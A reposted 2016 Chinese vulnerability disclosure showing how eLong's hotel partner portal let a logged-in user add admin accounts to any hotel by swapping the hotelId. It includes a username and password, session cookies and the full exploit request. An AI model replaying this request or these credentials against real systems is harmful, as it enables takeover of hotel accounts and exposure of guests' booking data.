HanDs
NO.2

[7月漏洞公开] 艺龙某站点严重漏洞可管理艺龙所有酒店/可以任意查看任意酒店开房信息(首页酒店演示) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

首页任意酒店均可!!!!!打雷了

详细说明:

http://ebooking.elong.com/

wangshuai/qwer1111



登陆以后

http://ebooking.elong.com/ebkcommon/dashboard

这里

添加一个用户

然后抓包

1.jpg





2.jpg





3.jpg





code 区域
POST /ebkauth/userManagement/addUserInfor HTTP/1.1
Host: ebooking.elong.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://ebooking.elong.com/ebkauth/userManagement/userInformation
Content-Length: 322
Cookie: zh_choose=n; EbkSessionId=76fa7b25cac343c8978a12f32554e86f; CookieGuid=54074839-3496-49e9-9e96-d993ce7b4a32; s_fid=245E4CC4B86BA63C-08A294CDF13BD07E; H5CookieId=fe135f4c-cbec-4b5a-a6db-a102617e8d3c; SessionToken=61567e21-3918-480b-b86b-b3deb5fdf1f3622; ShHotel=CityID=0101&CityNameCN=%E5%8C%97%E4%BA%AC%E5%B8%82&CityName=%E5%8C%97%E4%BA%AC%E5%B8%82&OutDate=2016-05-19&CityNameEN=Beijing&InDate=2016-05-18; lastRemind=1463554440038; route=cb2a03a8d3de38616d15d343e36b1cd4; JSESSIONID=39667774809875C15B9C2743EC09559C; viewIntroInfo=1
Connection: close

{"hotelStaff":{"staffName":"王帅","staffNameEn":"wangshuai9","passWord":"qwer1234","sex":"男","email":"","hotelId":"60201251","staffLevel":"1","hotelDept":"0","mobile":"131234xxxxx","singleHotelSign":1,"operator":"王帅"},"hotelUser":{"operator":"王帅","ebookingModels":"35,101,102,34,26,27,10,47,39,40,2,4,8,5,1,"}}







每个酒店hotelId对应一个酒店



http://www.elong.com/



首页任意挑选一个酒店



黄山滨江时尚主题酒店(屯溪老街店)



http://hotel.elong.com/huangshan/91097811/



91097811这个就是上面提到的hotelId



我们直接给这个酒店 添加管理用户

4.jpg





5.jpg





6.jpg





7.jpg





可能现在已经修复了

漏洞证明:

可能现在已经修复了



7.jpg

修复方案:

可能现在已经修复了


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
艺龙 站点 严重 漏洞 管理 艺龙 所有 酒店 /
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组